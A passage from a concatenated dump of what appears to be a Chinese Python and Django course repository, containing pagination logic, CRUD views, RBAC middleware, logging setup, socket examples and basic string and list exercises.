half_show >= total-page # if current_page + half_show >= total_page: # show_page_end = total_page # show_page_start = total_page - max_show # # 实际的总页码数 < max_show 比如我一共2页 # if total_page < max_show: # show_page_start = 1 # show_page_end = total_page # # # 数据切片的起点 # data_start = (current_page - 1) * per_page # # 数据切片的终点 # data_end = current_page * per_page # data = books[data_start:data_end] # # tmp = [] # page_html_start = '<nav aria-label="Page navigation" class="text-center"><ul class="pagination">' # page_html_end = '</ul></nav>' # tmp.append(page_html_start) # # 添加一个首页 # tmp.append('<li><a href="/book_list?page=1">首页</a></li>') # # # 添加一个上一页 # # 当当前页是第一页的时候不能再点击上一页 # if current_page - 1 <= 0: # tmp.append( # '<li class="disabled"><a href="#" aria-label="Previous"><span aria-hidden="true">&laquo;</span></a></li>') # else: # tmp.append( # '<li><a href="/book_list?page={}" aria-label="Previous"><span aria-hidden="true">&laquo;</span></a></li>'.format( # current_page - 1)) # # for循环添加要展示的页码 # for i in range(show_page_start, show_page_end + 1): # # 如果for循环的页码等于当前页码,给li标签加一个active的样式 # if current_page == i: # tmp.append('<li class="active"><a href="/book_list?page={0}">{0}</a></li>'.format(i)) # else: # tmp.append('<li><a href="/book_list?page={0}">{0}</a></li>'.format(i)) # # 添加一个下一页 # # 当前 当前页已经是最后一页,应该不让下一页按钮能点击 # if current_page + 1 > total_page: # tmp.append( # '<li class="disabled"><a href="#" aria-label="Previous"><span aria-hidden="true">&raquo;</span></a></li>') # else: # tmp.append( # '<li><a href="/book_list?page={}" aria-label="Previous"><span aria-hidden="true">&raquo;</span></a></li>'.format( # current_page + 1)) # # 添加一个尾页 # tmp.append('<li><a href="/book_list?page={}">尾页</a></li>'.format(total_page)) # tmp.append(page_html_end) # # page_html = "".join(tmp) # # # 序号 # xuhao=(current_page-1)*per_page # # return render(request, "book_list.html", {"books": data, "page_html": page_html,"num":xuhao}) # 分页 def publisher_list(request): publisher = models.Publisher.objects.all() total_count = publisher.count() # 总页面 current_page = request.GET.get("page") page_boj = mypage.MyPage(current_page, total_count, url_prefix="publisher_list") # 调用Mypage这个类,并传三个参数 data = publisher[page_boj.start:page_boj.end] # 从第几页显示到第几页 page_html = page_boj.page_html() # 页面 page_num = page_boj.num() # 序号 return render(request, "publisher_list.html", {"publisher": data, "page_html": page_html, "num": page_num}) # 中间件 def test(request): ''' views里面的视图函数 :param request: :return: ''' # print("这是test视图函数") # print(request.s21) # print(id(request)) return HttpResponse("o98k") # rep=HttpResponse("O98K") # def func(): # return HttpResponse('好好') # rep.render=func # return rep def author_list(request): data = models.Author.objects.all() return render(request, "author_list.html", {"author": data}) class Addauthor(views.View): def get(self, request): book_list = models.Book.objects.all() return render(request, "add_author.html", {"book_list": book_list}) def post(self, request): # 获取用户的新名字 auth_name = request.POST.get("name") # 获取用户添加的书,因为多选所有用getlist books_ids = request.POST.getlist("books") print(auth_name, books_ids) # 创建用户 author_obj = models.Author.objects.create(name=auth_name) # 去第三张关系表里建立记录 author_obj.books.set(books_ids) return redirect("/author_list/") class Editauthor(views.View): def get(self, request, edit_id): author_name = models.Author.objects.filter(id=edit_id).first() book_obj = models.Book.objects.all() return render(request, "edit_author.html", {"author_name": author_name, "book_list": book_obj}) def post(self, request, edit_id): author_obj = models.Author.objects.filter(id=edit_id).first() new_name = request.POST.get("name") # 获取选择的书 new_book = request.POST.getlist("books") author_obj.name = new_name author_obj.save() # 保存关联的书的id author_obj.books.set(new_book) return redirect("/author_list/") # 删除用户 def del_author(request, del_id): models.Author.objects.filter(id=del_id).delete() return redirect("/author_list/") # ajax def ajax_test(request): return render(request,".//ajax/ajax_test.html") #计算 def calc(request): i1=int(request.POST.get("i1")) i2=int(request.POST.get("i2")) ret=i1+i2 return HttpResponse(ret) def reg(request): return render(request,".//ajax/reg.html/") def check_username(request): username=request.POST.get("name") print(username) exsit_name=models.Userinfo.objects.filter(name=username) print(exsit_name) # obj=models.Userinfo.objects.first() # print(obj) if exsit_name: res="用户名已经存在" else: res="" return HttpResponse(res) <file_sep>/day27/s21crm/rbac/views/menu.py from django.shortcuts import render, redirect from rbac import models from rbac.forms.meau import MenuModelForm from django.urls import reverse def menu_list(request): """ 部门列表 :param request: :return: """ queryset = models.Menu.objects.all() return render(request, 'menu_list.html', {'queryset': queryset}) def menu_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = MenuModelForm() return render(request, 'menu_add.html', {'form': form}) form = MenuModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('menu_list') else: return render(request, 'menu_add.html', {'form': form}) def menu_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Menu.objects.filter(id=nid).first() if request.method == "GET": form = MenuModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'menu_edit.html', {"form": form}) form = MenuModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('menu_list') else: return render(request, 'menu_edit.html', {"form": form}) def menu_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.Menu.objects.filter(id=nid).delete() return redirect('menu_list') <file_sep>/day18/练习/static/a.js alert('这是publisher_list引用的js');<file_sep>/day23/auto - 2 - 固定二级菜单示例/web/views/home.py from django.shortcuts import render, redirect from web import models from web.forms import UserForm from web.modelform import OrderModelForm def add_user(request): form_obj = UserForm() username = request.POST.get("name") # print(username) if request.method == "POST": form_obj = UserForm(request.POST) if form_obj.is_valid(): # 校验数据有效性 old_name = models.User.objects.filter(name=username) if old_name: data = "用户名已经存在" return render(request, "add_user.html", locals()) else: models.User.objects.create(**form_obj.cleaned_data) return redirect("/web/user/") return render(request, "add_user.html", locals()) def del_user(request, pk): models.User.objects.filter(id=pk).delete() return redirect("/web/user/") def edit_user(request, pk): username = request.POST.get("name") user_obj = models.User.objects.filter(id=pk).first() from django.forms import model_to_dict user_dict = model_to_dict(user_obj) form_obj = UserForm(user_dict) if request.method == "POST": form_obj = UserForm(request.POST) if form_obj.is_valid(): old_name = models.User.objects.filter(name=username) if old_name: data = "用户名已经存在" return render(request, "edit_user.html", locals()) user_obj.name = form_obj.cleaned_data.get("name") user_obj.save() return redirect("/web/user/") return render(request, "edit_user.html", locals()) def info(requst): return render(requst, "user_info.html") def userlist(request): data = models.User.objects.all return render(request, 'userlist.html', {'user_list': data}) # from django.forms import ModelForm # # # class OrderModelForm(ModelForm): # class Meta: # model = models.Order # fields = "__all__" def add_order(request): if request.method == "GET": form = OrderModelForm() else: form = OrderModelForm(request.POST) if form.is_valid(): form.save() return redirect("/web/orderlist") return render(request, 'add_order.html', {'form': form}) def orderlist(request): data = models.Order.objects.all return render(request, 'orderlist.html', {'order_list': data}) def orderinfo(requst): return render(requst, "orderinfo.html") def edit_order(request, pk): obj = models.Order.objects.filter(id=pk).first() print(obj) if request.method == "GET": form = OrderModelForm(instance=obj) return render(request, 'edit_order.html', {"form": form}) else: form = OrderModelForm(instance=obj, data=request.POST) if form.is_valid(): form.save() return redirect("/web/orderlist/") return render(request, "edit_order.html", {"form": form}) def del_order(request, uid): models.Order.objects.filter(id=uid).delete() return redirect("/web/orderlist/") <file_sep>/day8/glance/api/__init__.py from . import policy<file_sep>/day9/进程/信号量.py from multiprocessing import Process,Semaphore import time,random def go_ktv(sem,user): sem.acquire() print('%s占到一件ktv小屋' %user) time.sleep(random.randint(3,5)) sem.release() print('%s走出小屋'%user) if __name__ == '__main__': sem=Semaphore(4) p_l=[] for i in range(13): p=Process(target=go_ktv,args=(sem,'user%s' %i,)) p.start() p_l.append(p) for i in p_l: i.join() print('##########') <file_sep>/day5/三级菜单.py menu = { '北京': { '海淀': { '五道口': { 'soho': {}, '网易': {}, 'google': {} }, '中关村': { '爱奇艺': {}, '汽车之家': {}, 'youku': {}, }, '上地': { '百度': {}, }, }, '昌平': { '沙河': { '老男孩': {}, '北航': {}, }, '天通苑': {}, '回龙观': {}, }, '朝阳': {}, '东城': {}, }, '上海': { '闵行': { "人民广场": { '炸鸡店': {} } }, '闸北': { '火车战': { '携程': {} } }, '浦东': {}, }, '山东': {}, } ##堆栈 # l = [menu] # # # print(l[-1]) # while l: # for key in l[-1]:print(key) # k = input('input>>').strip() # if k in l[-1].keys() and l[-1] [k]:l.append((l[-1][k])) # # elif k == 'b':l.pop() # elif k == 'q':break ##递归 # def func(dic): # while 1: # for key in dic: # print(key) # key = input('input>>').strip() # if key in dic.keys() and dic[key]: # ret = func(dic[key]) # #print(ret) # if ret =='q':break # elif key =='b' or key == 'q': # #print(key) # return key # func(menu) def threeLM(dic): while True: for k in dic:print(k) key = input('input>>').strip() if key == 'b':return if key == 'q':return 'q' elif key in dic.keys() and dic[key]: ret = threeLM(dic[key]) if ret == 'q': return 'q' threeLM(menu) <file_sep>/day16/mysite/app01/models.py from django.db import models # Create your models here. # 所有和数据库ORM相关的类都在这个文件定义,并且只能在这个文件定义 # 定义一个 出版社 类 class Publisher(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=32) def __str__(self): return self.name <file_sep>/day3/file文件操作.py # # with open('log1',encoding='utf-8',mode='r') as f1: # print(f1.read()) # f1.close() # f1 = open('log1',encoding='utf-8',mode='r+') # f1.seek(0,2) ##把光标调整到最后,然后再去写,原来的内容不会被覆盖 # f1.write('aaaaaaaaaaaa') # f1.seek(0) ##然后把光标调整到最前面,再去读 # print(f1.read()) # f1.close() # f1 = open('log1',encoding='utf-8',mode='w') # f1.write('我们都是好孩子') # f1.close() # f1 = open('log1',mode='wb') ##默认是bytes类型,然后转换成utf-8写入到log1文件中 # f1.write('我们都是好孩子'.encode('utf-8')) # f1.close() ##追加 a # f1 = open('log1',encoding='utf-8',mode='a') # f1.write('ddddddddddd') # f1.close() #可写可读a+ # f1 = open('log1',encoding='utf-8',mode='a+') # f1.write('999999') # f1.seek(0) # print(f1.read()) # f1.close() ##文件的改 # import os # with open('log1',encoding='utf-8') as f1,\ # open('log1.bak',encoding='utf-8',mode='w') as f2: # for line in f1: # new_line = line.replace('99','dd') # f2.write(new_line) ##把替换完成的内容,写到f2里面 # # os.remove('log1') # os.rename('log1.bak','log1') #read(n) # f1 = open('log1',encoding='utf-8') # print(f1.read(5)) # f1.close() # # f2 = open('log1',mode='rb') # print(f2.read(6).decode('utf-8')) # f2.close() #readlines f1 = open('log1',encoding='utf-8',) print(f1.readlines()) f1.close() f2 = open('log1',encoding='utf-8',mode='w') f2.write("aaaaaaaaaaaaa") print(f2.tell()) f2.close() <file_sep>/day7/hnf.py import logging def mylog(): global sh logger = logging.getLogger() # 先创造一个格式 formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') # 往文件中输入 fh = logging.FileHandler('log.log',encoding='utf-8') # 创造了一个能操作文件的对象fh fh.setFormatter(formatter) # 高可定制化 logger.addHandler(fh) logger.setLevel(logging.DEBUG) sh = logging.StreamHandler() #sh是在屏幕上面显示的 # sh.setFormatter(formatter1) logger.addHandler(sh) fh.setLevel(logging.ERROR) #文件里面显示error级别以上的 sh.setLevel(logging.DEBUG) #屏幕上面显示debug级别以上的 return logger mylog() def func(): print('ok') name=input('name:') pwd=input('pwd:') if name =='hu' and pwd =='123': #ret=mylog() sh.setLevel(logging.info('登录成功')) print('登录成功') func() else: print('登录失败') <file_sep>/day27/s21crm/crm/forms/user.py from django import forms from crm import models from crm.pwd.md5 import md5 # import md5 class UserInfoModelForm(forms.ModelForm): class Meta: model = models.UserInfo # 这里前面的model一定不要写models fields = '__all__' def __init__(self, *args, **kwargs): # 在父类的初始化方法中将7个字段当成字典放到了 self.fields 中。 super(UserInfoModelForm, self).__init__(*args, **kwargs) for key, field in self.fields.items(): field.widget.attrs['class'] = 'form-control' def clean_password(self): """ 密码对应的钩子方法 :return: """ user_input_pwd = self.cleaned_data['password'] return md5(user_input_pwd) <file_sep>/day2/练习.py #字符串 ''' name = "aleX leNb" #8) 将name变量对应的值中的第一个’l’替换成’p’,并输出结果 # print (name[1]) a = name.replace('l','p',1) print (a) #9) 将 name 变量对应的值根据 所有的“l” 分割,并输出结果。 b = name.split('l') print (b) #11) 将 name 变量对应的值变大写,并输出结果 c = name.upper() print (c) #12) 将 name 变量对应的值变小写,并输出结果 d = name.lower() print (d) #13) 将name变量对应的值首字母’a’大写,并输出结果 e = name.capitalize() print (e) #14) 判断name变量对应的值字母’l’出现几次,并输出结果 f = name.count('l') print (f) #15) 如果判断name变量对应的值前四位’l’出现几次,并输出结果 # g = name.count('l','0','4') # # print (g) #16) 从name变量对应的值中找到’N’对应的索引(如果找不到则报错),并输出结果 j = name.index('N') print (j) #17) 从name变量对应的值中找到’N’对应的索引(如果找不到则返回-1)输出结果 j1 = name.find('N') print (j1) #18) 从name变量对应的值中找到’X le’对应的索引,并输出结果 # h = name.find('X', 'le') # print (h) #19) 请输出 name 变量对应的值的第 2 个字符? h1 = name[1] print (h1) #20) 请输出 name 变量对应的值的前 3 个字符? h2 = name[:3] print (h2) #21) 请输出 name 变量对应的值的后 2 个字符? h3 = name[-2:] print (h3) #22) 请输出 name 变量对应的值中 “e” 所在索引位置? h4 = name.find('e') print (h4) ''' ''' s = '123a4b5c' #1)通过对li列表的切片形成新的字符串s1,s1 = ‘123’ s1 = s[0:3] print (s1) #2)通过对li列表的切片形成新的字符串s2,s2 = ‘a4b’ s2 = s[3:6] print (s2) #3)通过对li列表的切片形成新的字符串s3,s3 = ‘1345’ s3 = s[0:-1:2] print (s3) #4)通过对li列表的切片形成字符串s4,s4 = ‘2ab’ s4 = s[1:-2:2] print (s4) #5)通过对li列表的切片形成字符串s5,s5 = ‘c’ s5 = s[-1] print (s5) #6)通过对li列表的切片形成字符串s6,s6 = ‘ba2’ s6 = s[-3:0:-2] print (s6) #使用while和for循环分别打印字符串s=’asdfer’中每个元素。 b='asdfer' ''' ##列表 ''' li = ['alex','wusir','eric','rain','alex'] #1)计算列表的长度并输出 print(len(li)) #2)列表中追加元素’seven’,并输出添加后的列表 li.append('seven') print (li) #3)请在列表的第1个位置插入元素’Tony’,并输出添加后的列表 li.insert(0,'Tony') print (li) #4)请修改列表第2个位置的元素为’Kelly’,并输出修改后的列表 li[1] = 'kelly' print (li) #5)请将列表l2=[1,’a’,3,4,’heart’]的每一个元素添加到列表li中,一行代码实现,不允许循环添加。 l2=[1,'a',3,4,'heart'] li.append(l2) print (li) #6)请将字符串s = ‘qwert’的每一个元素添加到列表li中,一行代码实现,不允许循环添加。 s = 'qwert' li.extend(s) print (li) #7)请删除列表中的元素’eric’,并输出添加后的列表 li.remove('eric') print (li) #8)请删除列表中的第2个元素,并输出删除的元素和删除元素后的列表 a1 = li.pop(1) print (a1) print (li) #9)请删除列表中的第2至4个元素,并输出删除元素后的列表 del li[1:3] print (li) #10)请将列表所有得元素反转,并输出反转后的列表 li.reverse() print (li) #11)请计算出‘alex’元素在列表li中出现的次数,并输出该次数。 b = li.count('alex') print (b) ''' ''' #2,写代码,有如下列表,利用切片实现每一个功能 li = [1,3,2,'a','4','b','5','c'] c = li[-3:-1] print (c) #1)通过对li列表的切片形成新的列表l1,l1 = [1,3,2] l1 = li[:3] print (l1) #2)通过对li列表的切片形成新的列表l2,l2 = [’a’,4,’b’] l2 = li[3:6] print (l2) #3)通过对li列表的切片形成新的列表l3,l3 = [’1,2,4,5] l3 = li[:-1:2] print (l3) #4)通过对li列表的切片形成新的列表l4,l4 = [3,’a’,’b’] l4 = li[1:-2:2] print (l4) #5)通过对li列表的切片形成新的列表l5,l5 = [‘c’] l5 = li[-1:-3:-2] print (l5) #6)通过对li列表的切片形成新的列表l6,l6 = [‘b’,’a’,3] l6 = li[-3:0:-2] print (l6) ''' #利用下划线将列表的每一个元素拼接成字符串"alex_eric_rain" li = ['alex',' eric','wusir'] sa = '_'.join(li) print (sa) # for i in li: # # i.strip() # print (i.strip()) # i.startswith() ''' #6开发敏感词语过滤程序,提示用户输入评论内容,如果用户输入的内容中包含特殊的字符: li = ["苍老师","东京热",'武藤兰','波多野结衣'] new_list=[] m = input("请输入评论内容:").strip() for i in li: if m == i: m=m.replace(i,'...') new_list.append(m) else: new_list.append(m) print (new_list) ''' #5,查找列表li中的元素,移除每个元素的空格, # 并找出以’A’或者’a’开头,并以’c’结尾的所有元素,并添加到一个新列表中,最后循环打印这个新列表。 # li = ['alex', ' aric', ' rain'] # new_list=[] # for i in li: # m=i.strip() # print (m) # if m.startswith('a') or m.startswith('A'): # if m.endswith('c'): # new_list.append(m) # print (new_list) #有如下列表li = [1,3,4’,alex’,[3,7,8,’taibai’],5,’ritian’] #循环打印列表中的每个元素,遇到列表则再循环打印出它里面的元素。 #我想要的结果是(用两种方法实现,其中一种用range做): li = [1,3,4,'alex',[3,7,8,'taibai'],5,'ritian'] # for i in li: # if type(i) == type([]): # print (i) # # # else: # for a in i: # print (a) li = [1, 3, 4, 'alex', [3, 7, 8, 'taibai'], 5, 'ritian'] for i in li: if type(i) == type([]): for ii in i: print(ii) else: print(i) #3,写代码,有如下列表,按照要求实现每一个功能。 <file_sep>/day24/auto - 9 - 任务:构建权限和菜单的数据结构/auto - 9 - 任务:构建权限和菜单的数据结构/app01/views.py from django.shortcuts import render def login(request): """ 用户登录 :param request: :return: """ """ 用户登录:马帅,UserInfo表中做查询,登录成功后获取两部分数据: 权限 = { "user": {"url":'/app01/user/'}, "user_add": {"url":'/app01/user/add/'}, "user_edit": {"url":'/app01/user/edit/(\d+)'}, "order": {"url":'/app01/order/'}, } 菜单信息 = { 1:{ 'title':'用户管理', 'icon':'fa-clipboard', 'children':[ {'title':'用户列表','url':'/app01/user/'}, ] }, 2:{ 'title':'商品管理', 'icon':'fa-clipboard', 'children':[ {'title':'订单列表','url':'/app01/order/'}, ] } } """ <file_sep>/day16/04 动态页面.py import socket sk = socket.socket() sk.bind(('127.0.0.1', 8080)) sk.listen() # 定义一个专门用来处理访问index的函数 def index(): with open('index.html', 'r', encoding='utf8') as f: data = f.read() import time now = str(time.time()) data_s = data.replace('@@XX@@', now) return bytes(data_s, encoding='utf8') def home(): return b'home' # 定义一个访问路径和将要执行的函数的对应关系 url_func = [ ('/index/', index), ('/home/', home), ] while 1: conn, addr = sk.accept() # 接收消息 data = conn.recv(8000) # print(data) # 把字节类型的数据转换成字符串 data_str = str(data, encoding="utf8") # 将收到的消息按照\r\n分割,得到第一行 first_line = data_str.split("\r\n")[0] # 对第一行按照空格分 url = first_line.split()[1] print(url) # 根据用户访问的路径返回不同的内容 for i in url_func: if i[0] == url: func = i[1] break else: func = None if func: msg = func() else: msg = b'404 not found!' # 回复消息 # 按照约定好的格式回复消息 conn.send(b'http/1.1 200 ok\r\n\r\n') conn.send(msg) conn.close() <file_sep>/day8/粘包/client.py import socket ip_port=('127.0.0.1',8080) sk=socket.socket() res=sk.connect(ip_port) sk.send('hello'.encode('utf-8')) sk.send('egg'.encode('utf-8')) sk.close() <file_sep>/day21/CMS/templates/index.html {% extends "base.html" %} {% block page-css %} <link rel="stylesheet" href="/static/plugins/bootstrap-3.3.7/css/bootstrap.min.css"> <link rel="stylesheet" href="/static/css/index.css"> {% endblock %} {% block page-left %} <div class="panel panel-info"> <div class="panel-heading">业务线分类</div> <div class="panel-body"> {% for lob in lob_list %} {# <p><a href="">{{ lob.title }}({{ lob.faultreport_set.count }})</a></p>#} <p><a href="/fault-report/lob/{{ lob.title }}/">{{ lob.title }}({{ lob.num }})</a></p> {% endfor %} </div> </div> <div class="panel panel-success"> <div class="panel-heading">标签分类</div> <div class="panel-body"> {% for tag in tag_list %} <p><a href="/fault-report/tag/{{ tag.title }}/">{{ tag.title }}({{ tag.num }})</a></p> {% endfor %} </div> </div> <div class="panel panel-warning"> <div class="panel-heading">日期归档</div> <div class="panel-body"> {% for archive in archive_list %} <p><a href="/fault-report/archive/{{ archive.ym }}/">{{ archive.ym }}({{ archive.num }})</a></p> {% endfor %} </div> </div> {% endblock %} {% block page-right %} <div class="report-list"> {% for report in report_list %} <div class="report"> <div class="report-title"> {# title#} <h3><a href="/fault-report/report/{{ report.id }}">{{ report.title }}</a></h3> </div> <div class="report-desc"> {# //简介#} <p>{{ report.desc }}</p> </div> <div class="report-info"> <span>{{ report.user.username }}发布于</span> <span>{{ report.create_time }}</span> <span class="glyphicon glyphicon-comment" aria-hidden="true">评论({{ report.comment_count }})</span> <span class="glyphicon glyphicon-thumbs-up" aria-hidden="true">支持({{ report.up_count }})</span> <hr style="height: 1px;background-color: black; "> </div> </div> {% endfor %} {{ page_html|safe }} </div> {% endblock %}<file_sep>/day27/s21crm/crm/forms/course.py from django import forms from crm import models class CourseModelForm(forms.ModelForm): class Meta: model = models.Course # 这里前面的model一定不要写models fields = '__all__' error_messages = { 'name': {'required': '课程不能为空'} } widgets = { 'name': forms.TextInput(attrs={'class': 'form-control'}) } <file_sep>/day17/s21/app01/models.py from django.db import models # Create your models here. #创建用户库 class User(models.Model): id = models.AutoField(primary_key=True) username=models.CharField(max_length=32,unique=True) password=models.CharField(max_length=32) def __str__(self): return self.username # 创建业务表 class Service(models.Model): id = models.AutoField(primary_key=True) name=models.CharField(max_length=32,unique=True) # 创建主机表 class Host(models.Model): id = models.AutoField(primary_key=True) hostname = models.CharField(max_length=32) pwd=models.CharField(max_length=32) service=models.ForeignKey(to="Service",on_delete=models.CASCADE) <file_sep>/day7/mylog.py # logging # 日志 # 程序出错 -- 日志 对内看的 # 给用户看的 对外看的 import logging # 简单配置 # logging.basicConfig(level=logging.DEBUG, # format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s', # datefmt='%a, %d %b %Y %H:%M:%S', # filename='test.log', # filemode='w' # ) # logging.debug('debug message') # 非常细节的日志 —— 排查错误的时候使用 # logging.info('info message') # 正常的日志信息 # logging.warning('warning message') # 警告 # logging.error('error message') # 错误 # logging.critical('critical message') # 严重错误 # logger对象的方式配置 # 吸星大法 def mylog(): logger = logging.getLogger() # 先创造一个格式 formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') # 往文件中输入 fh = logging.FileHandler('log.log',encoding='utf-8') # 创造了一个能操作文件的对象fh fh.setFormatter(formatter) # 高可定制化 logger.addHandler(fh) logger.setLevel(logging.DEBUG) sh = logging.StreamHandler() #sh是在屏幕上面显示的 # sh.setFormatter(formatter1) logger.addHandler(sh) fh.setLevel(logging.ERROR) #文件里面显示error级别以上的 sh.setLevel(logging.DEBUG) #屏幕上面显示debug级别以上的 return logger # logger.debug('logger debug message') # logger.info('logger info message') # logger.warning('logger warning message') # logger.error('程序出错了') # logger.critical('logger critical message') mylog()<file_sep>/day18/练习/批量向数据库插入数据.py import os import django if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "练习.settings") django.setup() from app01 import models # 创建500个书籍对象 book_list=[models.Book(title="贝多芬第{}交响曲".format(i),publisher_id=i) for i in range (500)] # 批量提交到数据库 models.Book.objects.bulk_create(book_list) #批量添加出版社 # publisher_list = [models.Publisher(name="沙河第{}出版社".format(i)) for i in range(502)] # models.Publisher.objects.bulk_create(publisher_list, batch_size=30)<file_sep>/day27/s21crm/rbac/views/permission.py from django.shortcuts import render, redirect from rbac import models from rbac.forms.permission import PermissionModelForm from django.urls import reverse def permission_list(request): """ 部门列表 :param request :return: """ queryset = models.Permission.objects.all() return render(request, 'permission_list.html', {'queryset': queryset}) def permission_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = PermissionModelForm() return render(request, 'permission_add.html', {'form': form}) form = PermissionModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('permission_list') else: return render(request, 'permission_add.html', {'form': form}) def permission_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Permission.objects.filter(id=nid).first() if request.method == "GET": form = PermissionModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'permission_edit.html', {"form": form}) form = PermissionModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('permission_list') else: return render(request, 'permission_edit.html', {"form": form}) def permission_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.Permission.objects.filter(id=nid).delete() return redirect('permission_list') <file_sep>/day24/auto - 12 - 权限粒度控制到按钮/相关脚本/1.获取权限信息.py permission_menu_list = [ { 'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, { 'permissions__title': '添加用户', 'permissions__url': '/app01/user/add/', 'permissions__name': 'user_add', 'permissions__menu_id': None, 'permissions__menu__title': None, 'permissions__menu__icon': None, 'permissions__parent_id': 1, 'permissions__parent__name': 'user_list' }, { 'permissions__title': '编辑用户', 'permissions__url': '/app01/user/edit/(\\d+)', 'permissions__name': 'user_edit', 'permissions__menu_id': None, 'permissions__menu__title': None, 'permissions__menu__icon': None, 'permissions__parent_id': 1, 'permissions__parent__name': 'user_list' }, { 'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None } ] """ permission_dict = { "user_list": {"url":'/app01/user/'}, "user_add": {"url":'/app01/user/add/'}, "user_edit": {"url":'/app01/user/edit/(\d+)'}, "order": {"url":'/app01/order/'}, } """ permission_dict = {} for item in permission_menu_list: name = item['permissions__name'] url = item['permissions__url'] menu_id = item['permissions__menu_id'] parent_name = item['permissions__parent__name'] permission_dict[name] = {'url': url,'menu_id':menu_id,'parent_name':parent_name} print(permission_dict) <file_sep>/deploy/rbac/middlewares/rbac.py import re from django.utils.deprecation import MiddlewareMixin from django.conf import settings from django.shortcuts import HttpResponse, redirect from web import models class RBACMiddleware(MiddlewareMixin): """ 用户权限校验的中间件 """ def process_request(self, request): """ 用户认证 1. 当前请求的URL 2. 去Session中获取当前用户拥有的所有的权限 3. 权限校验 :param request: :return: """ current_url = request.path_info # 当前浏览器请求的url # 1. 白名单处理 for valid in settings.VALID_LIST: if re.match(valid, current_url): return None user_id = request.session.get('user_id') if not user_id: return redirect('/login/') user_object = models.UserInfo.objects.filter(id=user_id).first() # 获取当前登录用户的对象 request.user=user_object <file_sep>/day6/6.继承.py # 为什么会有继承? 解决代码的冗余问题 # class Person: # def __init__(self,name,hp,dps,sex): # self.name = name # self.hp = hp # self.dps = dps # self.sex = sex # self.bag = [] # def attack(self,dog): # dog.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) # # class Dog: # def __init__(self,name,kind,hp,dps): # self.name = name # self.hp = hp # self.dps = dps # self.kind = kind # # def bite(self,person): # person.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) # class Parent:pass # class Son(Parent):pass # 单继承 # Son类 继承 Parent类 # 父类 基类 超类 —— Parent类 # 子类 派生类 —— Son类 # 多继承 # class Parent1:pass # class Parent2:pass # # class Son(Parent1,Parent2):pass # class Animal: # def __init__(self, name, hp, dps): # self.name = name # self.hp = hp # self.dps = dps # def eat(self): # print('%s吃药回血了'%self.name) # class Person(Animal): # def __init__(self, name, hp, dps,sex): # super().__init__(name,hp,dps) # Animal.__init__(self,name,hp,dps) # self.sex = sex # 派生属性 # def attack(self,dog): # dog.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) # # class Dog(Animal): # def __init__(self,name,hp,dps,kind): # super().__init__(name, hp, dps) # Animal.__init__(self, name, hp, dps) # self.kind = kind # 派生属性 # def bite(self,person): # person.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) # alex = Person('alex',250,5,'N/A') # ha2 = Dog('哈士奇',15000,200,'藏獒') # print(alex.__dict__) # print(ha2.__dict__) # ha2.eat() # alex.eat() # ha2.bite(alex) # alex.attack(ha2) # 对象的内存空间 - 创建这个对象的类的内存空间 - 父类的 # class Foo: # def __init__(self): # self.func() # def func(self): # print('in Foo') # # class Son(Foo): # def func(self): # print('in Son') # Son() <file_sep>/day19/homework/s21/app01/loging.py import logging # from conf import setting def mylog(): logger = logging.getLogger() # 吸星大法 # 先创造一个格式 formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') # 往文件中输入 fh = logging.FileHandler('./logs/info.log', encoding='utf-8') # 创造了一个能操作文件的对象fh fh.setFormatter(formatter) # 高可定制化 logger.addHandler(fh) logger.setLevel(logging.DEBUG) # fh.setLevel(logging.INFO) # 文件里面显示error级别以上的 return logger<file_sep>/day19/modelform/app01/views.py from django.shortcuts import render, redirect from app01 import models from app01.forms import BookModelForm from django.contrib.auth.decorators import login_required # auth自带的装饰器 from django import views # Create your views here. def book_list(request): data = models.Book.objects.all() return render(request, "book_list.html", {"data": data}) @login_required def add_book(request): form_obj = BookModelForm() if request.method == "POST": form_obj = BookModelForm(request.POST) if form_obj.is_valid(): form_obj.save() return redirect("/book_list/") return render(request, "add_book.html", locals()) def edit_book(request, pk): book_obj = models.Book.objects.filter(id=pk).first() print("我是book_obj", book_obj) # instance实例 form_obj = BookModelForm(instance=book_obj) # 实例化的form_obj if request.method == "POST": # 获取用户提交过来的数据,用request.POST传过来的数据去更新book_obj这本书 form_obj = BookModelForm(request.POST, instance=book_obj) if form_obj.is_valid(): form_obj.save() return redirect("/book_list/") return render(request, "edit_book.html", locals()) from django.contrib import auth # 登录 def login(request): if request.method == "GET": return render(request, "login.html") else: next_url = request.GET.get("next") print(next_url) username = request.POST.get("username") pwd = request.POST.get("password") user_obj = auth.authenticate(request, username=username, password=pwd) 